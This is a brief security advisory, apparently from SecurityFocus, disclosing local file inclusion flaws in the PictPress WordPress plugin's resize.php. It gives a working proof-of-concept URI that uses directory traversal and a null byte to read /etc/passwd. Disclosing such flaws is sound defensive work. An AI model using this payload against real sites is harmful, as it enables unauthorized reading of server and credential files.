WordPress PictPress Plugin Resize.PHP Multiple Local File Include Vulnerabilities

Attackers can exploit these issues via a browser.

The following proof-of-concept URI is available:

http://www.example.com/wp-content/plugins/pictpress/resize.php?size=../../../../../../../../../../&path=/etc/passwd%00


 

Privacy Statement
Copyright 2010, SecurityFocus